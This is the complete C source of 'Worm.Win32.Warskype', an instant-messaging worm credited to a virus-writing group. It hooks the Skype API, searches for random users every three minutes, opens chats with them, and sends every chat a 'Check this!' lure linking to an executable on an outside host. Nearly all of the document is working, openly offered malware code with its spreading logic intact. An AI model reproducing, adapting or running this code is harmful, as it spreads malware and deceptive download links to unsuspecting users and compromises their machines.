Worm.Win32.Warskype - Source Code

1. /***********************************************************************************************
2.  * I saw many IM worms around but nothing using skype. Skype is a nice IM that let you to      *
3.  * chat or to do VoIP call, so it is possible to use this program like a spreading vector.     *
4.  * I tried to do direct file transfer but it didn't work so well, so I decided to send url     *
5.  * to worm to the found users.                                                                 *
6.  * This is only a demonstration, this is a direct action worm, it will work only if skype      *
7.  * is installed.                                                                               *
8.  * Greetz to: SkyOut, Nibble, izee, RadiatioN, berniee, sk0r, psyco_rabbit ... and everybody   *
9.  * on #vx-lab and #eof-project                                                                 *
10.  * bye bye ... by WarGame                                                                      *
11.  ***********************************************************************************************/
12.  
13.  
14. #include <windows.h>
15.  
16. /* Global handlers */
17. static UINT SkypeAttach;
18. static UINT SkypeDiscover;
19. static HWND Answer = NULL;
20. static HWND SkypeWnd = NULL;
21. static char rnd_nick[2];
22.  
23.  /* generate random nicks to search */
24. void GetRandNick(void)
25. {
26.    
27.     char possible_searches[] = "qwertyuiopasdfghjklzxcvbnm";
28.  
29.     srand(GetTickCount());
30.     rnd_nick[0] = possible_searches[rand()%26];
31.     rnd_nick[1] = 0;
32.  
33. }
34.  
35. DWORD WINAPI S3arch(LPVOID Data)
36. {
37.     char msg[128];
38.     COPYDATASTRUCT cds;
39.    
40.     while(1)
41.     {
42.     GetRandNick();
43.     sprintf(msg,"SEARCH USERS %s",rnd_nick);
44.     cds.dwData= 0;
45.     cds.lpData= msg;
46.     cds.cbData= strlen(msg)+1;         
47.     if(!SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&cds))
48.     {
49.         /* skype closed */
50.         ExitProcess(0);
51.     }
52.     Sleep((1000*60)*3); /* every 3 minutes */
53.     }
54. }
55.  
56. LRESULT CALLBACK SkypeProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
57. {
58.     PCOPYDATASTRUCT SkypeData = NULL;
59.     DWORD ThreadID;
60.     char *found_users = NULL,*chat_cmd = NULL,*chat_id = NULL,msg_cmd[256];
61.     COPYDATASTRUCT cds;
62.    
63.     if(uMsg == SkypeAttach)
64.     {
65.         if(lParam == 0)
66.         {
67.             SkypeWnd = (HWND)wParam;
68.             CreateThread(NULL,0,&S3arch,0,0,&ThreadID);
69.         }
70.     }
71.  
72.     if(uMsg == WM_COPYDATA)
73.     {
74.         if(wParam == SkypeWnd)
75.         {
76.             SkypeData=(PCOPYDATASTRUCT)lParam;
77.            
78.             if(SkypeData != NULL)
79.             {
80.                
81.                 if(strstr(SkypeData->lpData,"CHAT "))
82.                 {
83.                     strtok(SkypeData->lpData," ");
84.                     chat_id = strtok(NULL," ");
85.                     /* this will send the url to everybody :) */
86.                     sprintf(msg_cmd,"CHATMESSAGE %s Check this! http://marx2.altervista.org/surprise.exe",chat_id);
87.  
88.                     cds.dwData= 0;
89.                     cds.lpData= msg_cmd;
90.                     cds.cbData= strlen(msg_cmd)+1;         
91.                     SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&cds);
92.                 }
93.                
94.                 if(strstr(SkypeData->lpData,"USERS "))
95.                 {
96.                     found_users = (char *)GlobalAlloc(GMEM_ZEROINIT|GMEM_FIXED,3096);
97.                    
98.                     if(found_users == NULL)
99.                     {
100.                         ExitProcess(0);
101.                     }
102.  
103.                     chat_cmd = (char *)GlobalAlloc(GMEM_ZEROINIT|GMEM_FIXED,3096+128);
104.                    
105.                     if(chat_cmd == NULL)
106.                     {
107.                         ExitProcess(0);
108.                     }
109.  
110.                     strcpy(found_users,(char *)SkypeData->lpData);
111.  
112.                     strcpy(found_users,found_users+6);
113.  
114.                     sprintf(chat_cmd,"CHAT CREATE %s",found_users);
115.                    
116.                     /* contact them :) */
117.                     cds.dwData= 0;
118.                     cds.lpData= chat_cmd;
119.                     cds.cbData= strlen(chat_cmd)+1;        
120.                     SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&cds);
121.                    
122.                     GlobalFree(found_users);
123.                     GlobalFree(chat_cmd);
124.  
125.                 }
126.             }
127.         }
128.     }
129.    
130.     DefWindowProc( hWnd, uMsg , wParam, lParam);
131.  
132.     return 1; /* != 0 */
133. }
134.  
135. void MakeWindow(void)
136. {
137.     WNDCLASS wndcls;
138.    
139.     memset(&wndcls,0,sizeof(WNDCLASS));
140.    
141.     wndcls.lpszClassName = "WarSkype by [WarGame,#eof]";
142.     wndcls.lpfnWndProc = SkypeProc;
143.  
144.     if(RegisterClass(&wndcls) == 0)
145.     {
146.         ExitProcess(0);
147.     }
148.  
149.     Answer = CreateWindowEx(0, wndcls.lpszClassName, "Skype sucks!", 0, -1, -1, 0, 0,
150.         (HWND)NULL, (HMENU)NULL, (HINSTANCE)NULL, NULL);
151.  
152.     if(Answer == NULL)
153.     {
154.         ExitProcess(0);
155.     }
156. }
157.  
158. void RunSkype(void)
159. {
160.     HKEY hKey;
161.     char skype_path[MAX_PATH];
162.     DWORD len = MAX_PATH;
163.     STARTUPINFO inf_prog;
164.     PROCESS_INFORMATION info_pr;
165.     int user_ret;
166.  
167. #define ERROR MessageBox(NULL,"I could not find Skype !","Error!",MB_OK|MB_ICONERROR); \
168.               ExitProcess(0);
169.  
170.        /* path of skype in registry */
171.         if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Skype\\Phone",0,
172.             KEY_QUERY_VALUE,&hKey) != ERROR_SUCCESS)
173.         {
174.             ERROR
175.         }
176.          
177.         if(RegQueryValueEx(hKey,"SkypePath",0,NULL,skype_path,
178.             &len) != ERROR_SUCCESS)
179.         {
180.             ERROR
181.         }
182.  
183.         RegCloseKey(hKey);
184.  
185.         memset(&inf_prog,0,sizeof(STARTUPINFO));
186.         memset(&info_pr,0,sizeof(PROCESS_INFORMATION));
187.  
188.         inf_prog.cb = sizeof(STARTUPINFO);
189.         inf_prog.dwFlags = STARTF_USESHOWWINDOW;
190.         inf_prog.wShowWindow = SW_SHOW;
191.  
192.         if(CreateProcess(NULL,skype_path,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,NULL,
193.             NULL,&inf_prog,&info_pr))
194.         {
195.             MessageBox(NULL,"Allow this program in skype!","Warning!"
196.                 ,MB_OK|MB_ICONWARNING);
197.         }
198.  
199.         else
200.         {
201.             ERROR
202.         }
203. }
204.  
205. int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
206. {
207.     MSG oMessage;
208.     SkypeAttach = RegisterWindowMessage("SkypeControlAPIAttach");
209.     SkypeDiscover = RegisterWindowMessage("SkypeControlAPIDiscover");
210.    
211.     RunSkype(); /* (try to) run skype */
212.    
213.     if(SkypeAttach != 0 && SkypeDiscover != 0)
214.     {  
215.         MakeWindow(); /* Create window */
216.         SendMessage(HWND_BROADCAST, SkypeDiscover, Answer, 0);
217.  
218.         while(GetMessage( &oMessage, 0, 0, 0)!=FALSE)
219.         {
220.         TranslateMessage(&oMessage);
221.         DispatchMessage(&oMessage);
222.         }
223.        
224.  
225.     }
226.  
227. }